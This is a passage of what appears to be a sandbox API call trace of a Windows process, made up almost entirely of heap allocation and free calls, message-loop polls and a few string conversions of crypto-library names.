dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0235.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0235.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0235.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ea9940 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ebe448 [0235.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9940 | out: hHeap=0x970000) returned 1 [0235.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0235.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0235.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0235.296] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0235.296] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0235.296] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0235.298] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0235.298] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0235.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0235.298] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0235.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0235.299] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0235.299] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ea9940 [0235.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ed2f50 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9940 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0235.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ea9940 [0235.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed2f50 | out: hHeap=0x970000) returned 1 [0235.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14b00) returned 0x2ed2f50 [0235.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9940 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0235.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94e38 | out: hHeap=0x970000) returned 1 [0235.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0235.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0235.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 